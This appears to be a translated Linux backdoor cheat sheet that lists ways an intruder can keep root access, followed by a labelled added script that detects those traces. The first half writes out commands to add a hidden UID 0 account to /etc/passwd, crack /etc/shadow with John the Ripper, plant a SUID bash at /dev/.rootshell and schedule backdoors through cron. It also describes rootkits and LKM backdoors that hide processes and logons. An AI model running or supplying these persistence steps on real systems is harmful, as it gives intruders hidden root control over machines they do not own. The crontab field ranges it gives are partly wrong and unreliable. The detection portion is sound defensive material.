Common basic editing commands:
sed 's/src/dst/' file: replaces content in a file.
sed '1,5d' file: deletes lines 1 through 5 of a file.
wc -l file: calculates the number of lines in a file.
1. Add a Super User Account
useradd -o -u 0 -p "Linux encrypted password" imiyoo
echo "imiyoo:x:0:0::/:/bin/sh" >> /etc/passwd
2. Crack the root user password
./john /etc/shadow -show
./john -wordlist=passwd.lst /etc/shadow
3. Place a SUID shell
cp /bin/bash /dev/.rootshell
chmod a+s /dev/.rootshell // grant SUID permission, so the program runs with its owner's privileges
4. Crontab scheduled tasks
Use the crontab program to run installed backdoor programs on a schedule.
Crontab file content format description:
* * * * * command
minute, hour, day, month, weekday, command
The 1st column is the minute, 1 ~ 59. Every minute is written as * or */1.
The 2nd column is the hour, 1 ~ 23 (0 indicates midnight).
The 3rd column is the day of the month, 1 ~ 31.
The 4th column is the month, 1 ~ 12.
The 5th column is the day of the week, 0 ~ 6 (0 indicates Sunday).
The 6th column is the command to run.
',' separates multiple time points; '*/6' means the command runs every six units; '-' means the whole range from a start point to an end point.
Every minute, the cron service reads not only all files in /var/spool/cron but also /etc/crontab. Therefore, we can use this file to make the cron service do something. A crontab configuration belongs to a single user, while editing /etc/crontab defines a system task.
/sbin/service crond start // start the service
/sbin/service crond stop // stop the service
/sbin/service crond restart // restart the service
/sbin/service crond reload // reload the configuration
You can also enable the service automatically when the system starts:
Add:
/sbin/service crond start
crontab -l: lists the current user's crontab.
5. Rootkit toolkits
Includes a series of system and backdoor tools:
- Clears logon records from logs
- Camouflages checksums
- Replaces netstat, ps, and other network tools
- The backdoor logon program is easy to install and use.
6. Loadable kernel module (LKM)
LKM: Loadable Kernel Modules are loaded dynamically, without recompiling the kernel.
An LKM backdoor intercepts system calls and provides powerful functions such as hiding directories, files, processes, and network connections.
It is easy to discover and conceal itself. Well-known LKM packages include adore and knark.
Backdoor Detection
Use Tripwire or md5 verification to check the system. An IDS monitors suspicious network connections on the target machine.
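An added example (not from the original page): a POSIX shell script that checks for the traces left by methods 1, 3 and 4 above and performs the md5 verification mentioned here. The function names are hypothetical, and the baseline file is assumed to have been written with md5sum while the system was known to be clean.

```shell
#!/bin/sh
# Added example: defensive checks for traces of the persistence methods above.
# Function names are hypothetical, not taken from the page or any tool.

# Accounts in a passwd-format file that have UID 0 but are not named "root".
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Regular files under a directory that carry the setuid or setgid bit.
# A device directory such as /dev should normally contain none.
suid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Active (non-blank, non-comment) lines of the given crontab files.
cron_entries() {
    for f in "$@"; do
        if [ -f "$f" ]; then
            awk '!/^[ \t]*#/ && !/^[ \t]*$/ { print FILENAME ": " $0 }' "$f"
        fi
    done
}

# Files whose MD5 no longer matches a baseline written earlier by
# `md5sum FILE... > BASELINE` on a system known to be clean (assumption).
changed_files() {
    md5sum -c "$1" 2>/dev/null | awk -F': ' '$2 != "OK" { print $1 }'
}

# Run every check against the live system; $1 is an optional baseline path.
audit() {
    echo "== UID 0 accounts other than root"; uid0_accounts /etc/passwd
    echo "== setuid/setgid files under /dev"; suid_files /dev
    echo "== active cron entries"
    cron_entries /etc/crontab /var/spool/cron/*
    if [ -n "${1:-}" ]; then
        echo "== files changed since baseline"; changed_files "$1"
    fi
}

# Only touch the live system when asked to: sh audit.sh --run [BASELINE]
if [ "${1:-}" = "--run" ]; then
    audit "${2:-}"
fi
```

Because a rootkit can replace the system tools and camouflage checksums, run these checks with binaries from trusted media and keep the baseline off the machine being checked.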
7. View the release version of Linux
cat /etc/issue